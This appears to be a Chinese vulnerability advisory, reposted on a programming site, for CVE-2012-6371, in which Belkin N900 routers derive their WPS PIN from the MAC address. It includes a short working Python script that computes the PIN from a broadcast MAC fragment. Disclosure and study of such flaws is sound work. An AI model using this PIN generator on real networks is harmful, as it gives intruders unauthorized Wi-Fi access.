发布日期:2013-01-03
更新日期:2013-01-06受影响系统:
Belkin Wireless Router Belkin N900 F9K1104v1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57128
CVE(CAN) ID: CVE-2012-6371
Belkin Wireless Routers是美国贝尔金公司的无线路由器产品。
Belkin N900 F9K1104v1及其他版本在WPA2的实现上,用基于6位数字的LAN/WLAN MAC地址建立了WPS PIN,通过读取广播报文,远程攻击者可利用此漏洞访问Wi-Fi网络。
<*来源:ZhaoChunsheng (e.novellalorente@student.ru.nl)
链接:http://ednolo.alumnos.upv.es/?p=1295
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
@author : e.novellalorente@student.ru.nl
Original work : ZhaoChunsheng 04/07/2012 """ import sys VERSION = 0
SUBVERSION = 2 def usage():
print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
print "[*] Usage : python WPSpin.py 123456"
sys.exit(0) def wps_pin_checksum(pin):
accum = 0 while(pin):
accum += 3 * (pin % 10)
pin /= 10
accum += pin % 10
pin /= 10
return (10 - accum % 10) % 10 try:
if (len(sys.argv[1]) == 6):
p = int(sys.argv[1] , 16) % 10000000
print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
else:
usage()
except Exception:
usage()建议:
--------------------------------------------------------------------------------
厂商补丁:
Belkin
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.belkin.com/Facebook Camera for iOS SSL证书验证信息泄露漏洞WordPress Google Doc Embedder插件任意文件泄露漏洞相关资讯 Belkin Wireless Router 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在
|
易网时代-编程资源站